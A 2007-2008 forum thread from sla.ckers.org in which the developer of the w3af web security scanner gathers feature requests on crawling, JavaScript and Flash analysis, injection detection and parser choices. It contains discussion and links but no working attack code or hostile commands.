Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
w3af - feedback and feature requests
Posted by: andresRiancho
Date: November 22, 2007 07:02AM

Hi!,

Given that this forum is full of web application security experts =), I would like to get some feedback regarding the w3af project [0]. Also, if any of you guys have a feature request, do not hesitate to ask for it via email or in this forum thread.

[0] http://w3af.sourceforge.net/

--
Andres

Options: ReplyQuote
Re: w3af - feedback and feature requests
Posted by: ntp
Date: November 23, 2007 09:19PM

how about a built-in JSE for ajax crawling, swfrw integration so it can walk flash, and libexif to extract/view EXIF metadata? support for java applets, google gears, JFX, silverlight, and AIR would also be very cool. web services support such as REST and others would be great - as well as going beyond SOAP/XML injections to add XSD mutations and all the stuff that Shreeraj Shah talked about at the OWASP AppSec conference in San Jose, eBay, 2007. there was also a talk on csrf that mentioned the new owasp CSRFTester tool, which would also be interesting to integrate (i only knew about Chris Shifflet's and pdp's csrf redirectors before this tool became available).

i really think you should concentrate more on the core of the program as well - finding sqli, xss, and hrs. i'd like to see better concepts for blind sqli, 2nd-order sqli, inference attacks (like absinthe), etc. same goes for xss, but instead using double/triple encoding, canonicalization, compression use and further obfuscation, and the DOM (i.e. something better than HackVertor). you already have some good ideas and code here - but i'd like to see improvements such as an increased time-to-hack that could possibly use fingerprinting or user-defined criteria to enhance the testing of these issues.

new attacks such as found in sensepost's squeeza and suru tools might also be interesting additions. additionally, techniques such as the fortify javascript hijacking (really just csrf-based json hijacking) would be interesting to implement.

i'd like you to combine aspects of passive analysis techniques such as those found in proxmon or pantera.

i wonder if you could get better use out of pyparsing instead of beautifulsoup for future versions.

Options: ReplyQuote
Re: w3af - feedback and feature requests
Posted by: andresRiancho
Date: November 24, 2007 08:39AM

ntp,

That's what I call a feature request message! =) Going to answer inline:

ntp Wrote:
-------------------------------------------------------
> how about a built-in JSE for ajax crawling, swfrw
> integration so it can walk flash, and libexif to
> extract/view EXIF metadata?

Right now I'm playing with pykhtml, pyxpcom and zc.testbrowser.real to define what is the best approach to executing ana analyzing javascript. Regarding flash, I still haven't started with that, didn't even knew swfrw existed ( and google only returns some slightly related search results when I search for swfrw +flash, could you give me the project URL ? ).

Regarding EXIF metadata, that could be done easily, but it's a not so important feature if you compare it with javascript and flash analysis.

> support for java
> applets, google gears, JFX, silverlight, and AIR
> would also be very cool.

I see this list of features a lot harder to implement, I will add them to the TODO list, but don't expect them to appear for at least one year. Right now I'm the only one that's contributing to the w3af project and I don't really have much time, if you know anyone that wants to contribute, let me/him/she know =)

> web services support
> such as REST and others would be great - as well
> as going beyond SOAP/XML injections to add XSD
> mutations and all the stuff that Shreeraj Shah
> talked about at the OWASP AppSec conference in San
> Jose, eBay, 2007.

REST web services were in my TODO list, but i don't really think they are so important right now.

> there was also a talk on csrf
> that mentioned the new owasp CSRFTester tool,
> which would also be interesting to integrate (i
> only knew about Chris Shifflet's and pdp's csrf
> redirectors before this tool became available).

I have coded a csrf plugin, it's simple but it does it's work. I'll take a look at the csrftester tool to see if i'm missing something.

> i really think you should concentrate more on the
> core of the program as well - finding sqli, xss,
> and hrs. i'd like to see better concepts for
> blind sqli, 2nd-order sqli, inference attacks
> (like absinthe), etc.

better concepts like what ?

> same goes for xss, but
> instead using double/triple encoding,
> canonicalization, compression use and further
> obfuscation, and the DOM (i.e. something better
> than HackVertor). you already have some good
> ideas and code here - but i'd like to see
> improvements such as an increased time-to-hack
> that could possibly use fingerprinting or
> user-defined criteria to enhance the testing of
> these issues.

Right now I only detect xss and "exploit" it with beEF, I don't really plan on doing much more with xss. Maybe in the future, when all the other features are finished I'll port beEF to python or something like that, or maybe someone in this forum will do it for me ? ;)

> new attacks such as found in sensepost's squeeza
> and suru tools might also be interesting
> additions.

The work that squeeza does is done in w3af with sqlmap ( which is a great tool! )

If by suru features you mean: "Suru not only catches requests that were made by the user, but also requests that use the IE object, such as rich applications using web services, MSN ads, Google Earth requests, application auto-updates etc. The proxy understands multi part POSTs (MPPs) and XML POSTs (used for web services)." I don't think this is a must-have feature.

> additionally, techniques such as the
> fortify javascript hijacking (really just
> csrf-based json hijacking) would be interesting to
> implement.

Going to look into that,

> i'd like you to combine aspects of passive
> analysis techniques such as those found in proxmon
> or pantera.

Yes, that's A GREAT idea, and i'm sure it will be implemented in the future. I still have to finish with the "fully automated" section of w3af, and then I'll plug proxmon / pantera in or maybe i'll code something from scratch myself.

> i wonder if you could get better use out of
> pyparsing instead of beautifulsoup for future
> versions.

hmmm , I don't really see why you wan't me to use pyparsing instead of beautifulsoup. Could you explain this ?

And finally I also want to say that a gtk GUI is already on the TODO list =) If any you wants to contribute with the w3af project, you are welcome! As you can see, there is a lot of work to be done, the project is just starting and your help will be appreciated.

--
Andres

Options: ReplyQuote
Re: w3af - feedback and feature requests
Posted by: ntp
Date: November 25, 2007 06:35PM

andresRiancho Wrote:
-------------------------------------------------------
> That's what I call a feature request message!
> =) Going to answer inline:

Actually I wanted to address some stuff on your mailing-list and in the presentation that you did as well, but I didn't want it to look like I'm stalking you.

> Right now I'm playing with pykhtml, pyxpcom and
> zc.testbrowser.real to define what is the best
> approach to executing and analyzing javascript.

I would be very impressed with a browser driver, such as the Zope testbrowser. Other options include WebDriver (really HtmlUnit in Java), Selenium RC (many languages), Sahi, RBNarcissus, Wati[rnj], firewatir, etc. One of my favorite utilities is CAL9000 because it can be used in more than one web browser - however it's no longer in active development. What's your opinion on "nextgen tools will run from the browser" - http://www.gnucitizen.org/blog/the-next-generation-of-security-tools-will-run-from-the-browser ?

The direction of Wapiti towards RubyfulSoup is interesting to me, but I think this will end up being the wrong approach.

In-browser, you run into speed issues - and going cross-browser with your crawling and parsing just makes matters worse. Consider how Selenium works great with XPath or native tests in Firefox, but then try and use those on IE... the native tests won't work and the XPath selectors are way too slow.

I think pdp and John Resig figured out how to do this properly in a lot of scenarios using jQuery or whatever the Technika Security Framework is going to end up using (jquery-[include|json]?), but then again sometimes it doesn't work out.

Some people I know prefer using CSS selectors or DOM locators (native or not), I'm not sure why. I think using native (e.g. document.getElementsByClassName in Firefox 3) is certainly going to be the fastest approach (it's 8 times faster than XPath), but for browser drivers I almost don't care about fast as much I as I do portability across platforms (Mac OS X, XPSP2, Vista especially) and browsers (FF 1.5/2/3, IE3/4/5/6/7, Opera, and Safari)... because I'd want to use it to test XSS, which is different depending on the browser/JSE implementations.

Really, I think these should be done with XPath (falling back to DOM locators), except that XPath doesn't work great in IE with Selenium, where the general recommendation is to covert all the XPath expression to DOM expressions. This actually seems like a lot of work, but it really is probably the best approach for browser drivers as things stand today. Personally, I think WebDriver, Selenium, and Sahi are all about equal when it comes to browser driving, while I would probably prefer firewatir/Watir for crawling Ajax just for speed.

For speed in Web 1.0, I always thought FEAR::API's use of larbin provided the best results
http://search.cpan.org/dist/FEAR-API/lib/FEAR/API.pm
http://larbin.sourceforge.net/index-eng.html

While Wapiti is moving towards the "more web 2.0 support with best parsing support", I see Grabber moving towards the "using Qt/C++ will make this faster, and thus, better" approach.

I wish more crawlers would provide more configurable options. I've always liked Burp Spider's ability to deal with forms and go from interactive crawling to automated and back.

Some commercial scanners allow going form DFS (depth-first) to BFS (breadth-first) just by marking a checkbox. What if I want something instead that would be more like a covert crawl - http://www.layerone.info/archives/2006/presentations/Covert_Crawling-LayerOne-Billy_Hoffman.pdf ?

My point is that each website that a person is targeting has different options, so providing only one way of crawling or parsing is not going to work for some websites or some testers.

> Regarding flash, I still haven't started with
> that, didn't even knew swfrw existed ( and google
> only returns some slightly related search results
> when I search for swfrw +flash, could you give me
> the project URL ? ).

Well I was thinking of anything that could read and write SWF files, such as http://www.swftools.org

e.g. swfdump -D file.swf | grep URL

For writing, I was thinking something more along the lines of
http://www.docuverse.com/blog/donpark/2007/11/18/client-side-swf-generation-tip
or http://www.gnucitizen.org/blog/aflax-and-something-more
for you know... backdooring flash objects - http://www.gnucitizen.org/blog/backdooring-flash-objects-receipt
or writing in flash redirects - http://www.mcgrewsecurity.com/blog/?p=60

> If by suru features you mean

i meant the timing attack stuff they added to it and none of the rest

> hmmm , I don't really see why you wan't me to use
> pyparsing instead of beautifulsoup. Could you
> explain this ?

no particular reason, other than i'd like to see more people build on it because it appears more elegant to me. i haven't played much with it either, but i'd be interested to hear your thoughts on the matter.

> And finally I also want to say that a gtk GUI is
> already on the TODO list =) If any you wants to
> contribute with the w3af project, you are welcome!
> As you can see, there is a lot of work to be done,
> the project is just starting and your help will be
> appreciated.

i'm on the mailing-list and will chime in when i have interesting things to say or add. if i have time (in 2008), i'll gladly contact you and see what i can work on then. you and everyone who has worked on w3af has done great work so far... i really have nothing to say about it except that it's great.

are you going to keep the GUI and CLI tools separate or make the CLI go away?

Options: ReplyQuote
Re: w3af - feedback and feature requests
Posted by: andresRiancho
Date: November 26, 2007 08:36AM

ntp Wrote:
-------------------------------------------------------
> andresRiancho Wrote:
> --------------------------------------------------
> -----
> > That's what I call a feature request
> message!
> > =) Going to answer inline:
>
> Actually I wanted to address some stuff on your
> mailing-list and in the presentation that you did
> as well, but I didn't want it to look like I'm
> stalking you.

It's ok, if you don't want to look like a stalker in public, mail me in private ;) Good feedback and new ideas are ALWAYS welcome.

> > Right now I'm playing with pykhtml, pyxpcom and
> > zc.testbrowser.real to define what is the best
> > approach to executing and analyzing javascript.
>
> I would be very impressed with a browser driver,
> such as the Zope testbrowser. Other options
> include WebDriver (really HtmlUnit in Java),
> Selenium RC (many languages), Sahi, RBNarcissus,
> Wati, firewatir, etc. One of my favorite utilities
> is CAL9000 because it can be used in more than one
> web browser - however it's no longer in active
> development.

I really like your comments, because they include a lot of tool names that i don't even know. I will search for all this tools and give you a feedback, maybe in the w3af mailing list when I decide what tool to use to analyze js. One of the things that you must keep in mind, is that w3af aims to be pure python, so many of the tools you mention are slightly out of scope.

> What's your opinion on "nextgen
> tools will run from the browser" -
> http://www.gnucitizen.org/blog/the-next-generation
> -of-security-tools-will-run-from-the-browser ?

pdp thinks that javascript is the future of the world, I don't agree at all. JS / XSS / web2.0. etc are interesting things to play and in some cases vulnerabilities, thats all.

> The direction of Wapiti towards RubyfulSoup is
> interesting to me, but I think this will end up
> being the wrong approach.

I thought that Wapiti was coded in python, I don't know why they used RubyfulSoup if Beautiful Soup exists.... strange choice!

> In-browser, you run into speed issues - and going
> cross-browser with your crawling and parsing just
> makes matters worse. Consider how Selenium works
> great with XPath or native tests in Firefox, but
> then try and use those on IE... the native tests
> won't work and the XPath selectors are way too
> slow.
>
> I think pdp and John Resig figured out how to do
> this properly in a lot of scenarios using jQuery
> or whatever the Technika Security Framework is
> going to end up using (jquery-?), but then again
> sometimes it doesn't work out.
>
> Some people I know prefer using CSS selectors or
> DOM locators (native or not), I'm not sure why. I
> think using native (e.g.
> document.getElementsByClassName in Firefox 3) is
> certainly going to be the fastest approach (it's 8
> times faster than XPath), but for browser drivers
> I almost don't care about fast as much I as I do
> portability across platforms (Mac OS X, XPSP2,
> Vista especially) and browsers (FF 1.5/2/3,
> IE3/4/5/6/7, Opera, and Safari)... because I'd
> want to use it to test XSS, which is different
> depending on the browser/JSE implementations.
>
> Really, I think these should be done with XPath
> (falling back to DOM locators), except that XPath
> doesn't work great in IE with Selenium, where the
> general recommendation is to covert all the XPath
> expression to DOM expressions. This actually
> seems like a lot of work, but it really is
> probably the best approach for browser drivers as
> things stand today. Personally, I think
> WebDriver, Selenium, and Sahi are all about equal
> when it comes to browser driving, while I would
> probably prefer firewatir/Watir for crawling Ajax
> just for speed.
>
> For speed in Web 1.0, I always thought FEAR::API's
> use of larbin provided the best results
> http://search.cpan.org/dist/FEAR-API/lib/FEAR/API.
> pm
> http://larbin.sourceforge.net/index-eng.html

I will test all the tools and let you know my opinions about them.

> While Wapiti is moving towards the "more web 2.0
> support with best parsing support", I see Grabber
> moving towards the "using Qt/C++ will make this
> faster, and thus, better" approach.

About grabber, I like this features:

# Simple AJAX testing
# JavaScript source code analyzer
# Hybrid analysis/Crystal ball testing using PHP-SAT

The nicest feature is the hybrid analysis, I would like to add that, but adding a php-sat dependency is too much. I want to keep a good balance between features and dependencies.

About the "using Qt/C++ will make this faster, and thus, better" approach, i don't think thats necessary true..., the highest delay of this kind of tools is the HTTP request/response time, so a C++ core is not a *must have* feature.

> I wish more crawlers would provide more
> configurable options. I've always liked Burp
> Spider's ability to deal with forms and go from
> interactive crawling to automated and back.
>
> Some commercial scanners allow going form DFS
> (depth-first) to BFS (breadth-first) just by
> marking a checkbox. What if I want something
> instead that would be more like a covert crawl -
> http://www.layerone.info/archives/2006/presentatio
> ns/Covert_Crawling-LayerOne-Billy_Hoffman.pdf ?
>
> My point is that each website that a person is
> targeting has different options, so providing only
> one way of crawling or parsing is not going to
> work for some websites or some testers.

Adding this as a feature request of w3af =)

> > Regarding flash, I still haven't started with
> > that, didn't even knew swfrw existed ( and
> google
> > only returns some slightly related search
> results
> > when I search for swfrw +flash, could you give
> me
> > the project URL ? ).
>
> Well I was thinking of anything that could read
> and write SWF files, such as
> http://www.swftools.org
>
> e.g. swfdump -D file.swf | grep URL

Once again, this is a fight of dependencies against features.

> For writing, I was thinking something more along
> the lines of
> http://www.docuverse.com/blog/donpark/2007/11/18/c
> lient-side-swf-generation-tip
> or
> http://www.gnucitizen.org/blog/aflax-and-something
> -more
> for you know... backdooring flash objects -
> http://www.gnucitizen.org/blog/backdooring-flash-o
> bjects-receipt
> or writing in flash redirects -
> http://www.mcgrewsecurity.com/blog/?p=60

That would be make a cool attack plugin.

> > If by suru features you mean
>
> i meant the timing attack stuff they added to it
> and none of the rest

+ Support for response timing analysis.

If you check in the w3af svn, you will see that I had this feature, but I ended up removing it just because it didn't worked. I think that the implementation was the problem, and maybe the sensepost guys did it the right way ? will see..

> > hmmm , I don't really see why you wan't me to
> use
> > pyparsing instead of beautifulsoup. Could you
> > explain this ?
>
> no particular reason, other than i'd like to see
> more people build on it because it appears more
> elegant to me. i haven't played much with it
> either, but i'd be interested to hear your
> thoughts on the matter.

I haven't played with pyparsing, but beautifulsoup does the work and does it in pure python and without much trouble. For what I have seen, pyparsing would fail to analyze wrongly written HTML (most pages) while beautifulsoup will fix those html and give w3af something that is sanitized and much more "ready to use".

> > And finally I also want to say that a gtk GUI
> is
> > already on the TODO list =) If any you wants to
> > contribute with the w3af project, you are
> welcome!
> > As you can see, there is a lot of work to be
> done,
> > the project is just starting and your help will
> be
> > appreciated.
>
> i'm on the mailing-list and will chime in when i
> have interesting things to say or add. if i have
> time (in 2008), i'll gladly contact you and see
> what i can work on then. you and everyone who has
> worked on w3af has done great work so far... i
> really have nothing to say about it except that
> it's great.

Great! I hope to read more of you in the future, and I would gladly receive your help with any of the points we have been talking about.

> are you going to keep the GUI and CLI tools
> separate or make the CLI go away?

w3af's CLI will never disappear, GTK or some other framework GUI will be created for ease of use.

--
Andres

Options: ReplyQuote
Re: w3af - feedback and feature requests
Posted by: nEUrOO
Date: December 14, 2007 08:13AM

andresRiancho Wrote:
-------------------------------------------------------
> > While Wapiti is moving towards the "more web
> 2.0
> > support with best parsing support", I see
> Grabber
> > moving towards the "using Qt/C++ will make this
> > faster, and thus, better" approach.
>
> About grabber, I like this features:
>
> # Simple AJAX testing
> # JavaScript source code analyzer
> # Hybrid analysis/Crystal ball testing using
> PHP-SAT
>
> The nicest feature is the hybrid analysis, I would
> like to add that, but adding a php-sat dependency
> is too much. I want to keep a good balance between
> features and dependencies.
>
> About the "using Qt/C++ will make this faster, and
> thus, better" approach, i don't think thats
> necessary true..., the highest delay of this kind
> of tools is the HTTP request/response time, so a
> C++ core is not a *must have* feature.

Argh, i missed the discussion but well, let's comment about it. So yes I'm starting over Grabber with a core in Qt/C++/WebKit.
WebKit is important since the new tool will have webkit as core parser and therefor should execute JavaScript, Flash and whatever with good plugins.

The idea is actually to move to another type of tool where the pen-tester will be able to create his own attacks (made as plugins in either C++ or JavaScript). The pen-tester would also be able to crawl the website manually with a browser, and the steps would be repeated for the attacks.
So as, you see, it's moving to a totally different approach, not fully automated for now.

As I would like to keep the backward features of Grabber, I will plug something I'
ve been developing (but needs dev) php-ast/oracle -- http://trac2.assembla.com/php-ast and I will also try to add a JavaScript static analyzer.

So finish for Grabber ads. for the C++ core engine, I think it's interesting if you want to move to more comprehensive detection. Detecting strings are simple and fast, trying to do smart detection is more complex (using AI or not) and thus, needs faster engine; especially if you want to combine different detections on the same attacks and keeping the results as a knowledge for next detections...

My 2 cents.

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Options: ReplyQuote
Re: w3af - feedback and feature requests
Posted by: lpilorz
Date: December 14, 2007 05:45PM

Hi,
are you planning to add mod_rewrite support for w3af in the future?

Options: ReplyQuote
Re: w3af - feedback and feature requests
Posted by: andresRiancho
Date: January 03, 2008 12:41PM

nEUrOO Wrote:
-------------------------------------------------------
> andresRiancho Wrote:
> --------------------------------------------------
> -----
> > > While Wapiti is moving towards the "more web
> > 2.0
> > > support with best parsing support", I see
> > Grabber
> > > moving towards the "using Qt/C++ will make
> this
> > > faster, and thus, better" approach.
> >
> > About grabber, I like this features:
> >
> > # Simple AJAX testing
> > # JavaScript source code analyzer
> > # Hybrid analysis/Crystal ball testing using
> > PHP-SAT
> >
> > The nicest feature is the hybrid analysis, I
> would
> > like to add that, but adding a php-sat
> dependency
> > is too much. I want to keep a good balance
> between
> > features and dependencies.
> >
> > About the "using Qt/C++ will make this faster,
> and
> > thus, better" approach, i don't think thats
> > necessary true..., the highest delay of this
> kind
> > of tools is the HTTP request/response time, so
> a
> > C++ core is not a *must have* feature.
>
> Argh, i missed the discussion but well, let's
> comment about it. So yes I'm starting over Grabber
> with a core in Qt/C++/WebKit.
> WebKit is important since the new tool will have
> webkit as core parser and therefor should execute
> JavaScript, Flash and whatever with good plugins.

I agree that having webkit as a base is a really good choice. I disagree with the language selection, I think that developing in C++ will take much more time than in python.

> The idea is actually to move to another type of
> tool where the pen-tester will be able to create
> his own attacks (made as plugins in either C++ or
> JavaScript).

I vote for javascript! If you use plugins in c++, wouldn't you need a c++ compiler ?

> The pen-tester would also be able to
> crawl the website manually with a browser, and the
> steps would be repeated for the attacks.
> So as, you see, it's moving to a totally different
> approach, not fully automated for now.

It's a good approach; w3af has also this kind of feature, check the spiderMan plugin:

http://w3af.sourceforge.net/pluginDesc.php#spiderMan

> As I would like to keep the backward features of
> Grabber, I will plug something I'
> ve been developing (but needs dev) php-ast/oracle
> -- http://trac2.assembla.com/php-ast and I will
> also try to add a JavaScript static analyzer.

We have talked about this in private, and I must say it in public, I love the fact of combining static code analyzers and blackbox testing. I hope that w3af can have static code analysis plugins in the future; but first I need to have a stable core, and a lot of plugins that are missing or not working as expected.

> So finish for Grabber ads. for the C++ core
> engine, I think it's interesting if you want to
> move to more comprehensive detection. Detecting
> strings are simple and fast, trying to do smart
> detection is more complex (using AI or not) and
> thus, needs faster engine; especially if you want
> to combine different detections on the same
> attacks and keeping the results as a knowledge for
> next detections...
>
> My 2 cents.

You plan to use some complex algorithms and possibly IA ? I want to see that code!

--
Andres

Options: ReplyQuote
Re: w3af - feedback and feature requests
Posted by: andresRiancho
Date: January 03, 2008 12:46PM

lpilorz Wrote:
-------------------------------------------------------
> Hi,
> are you planning to add mod_rewrite support for
> w3af in the future?

I'm not sure what you mean by this, but w3af can find vulnerabilities in URL filenames, for example, w3af could find a XSS in parameter2, given the following original URL:

http://localhost/directoryA/scriptName/parameter1-parameter2-parameter3

w3af will perform the following requests:

http://localhost/directoryA/scriptName/JAVASCRIPT-parameter2-parameter3
http://localhost/directoryA/scriptName/parameter1-JAVASCRIPT-parameter3
http://localhost/directoryA/scriptName/parameter1-parameter2-JAVASCRIPT

And analyze the responses.

--
Andres

Options: ReplyQuote
Re: w3af - feedback and feature requests
Posted by: lpilorz
Date: January 05, 2008 05:40AM

I rather meant crawler configuration, to save time in case example.com/X.html is rewritten into example.com/script.php?var=X
For an application with lot of rewriting it's a must-have scanner feature, otherwise there will be millions of URL to crawl.

Options: ReplyQuote
Re: w3af - feedback and feature requests
Posted by: andresRiancho
Date: January 06, 2008 08:50PM

lpilorz Wrote:
-------------------------------------------------------
> I rather meant crawler configuration, to save time
> in case example.com/X.html is rewritten into
> example.com/script.php?var=X
> For an application with lot of rewriting it's a
> must-have scanner feature, otherwise there will be
> millions of URL to crawl.

Oh, that is a really good feature request! Thanks for the good idea, I'm adding it to my task list. It's not going to be easy to do it, but I hope to have this feature ready for the 1.0 version.

Thanks!

--
Andres

Options: ReplyQuote


Sorry, only registered users may post in this forum.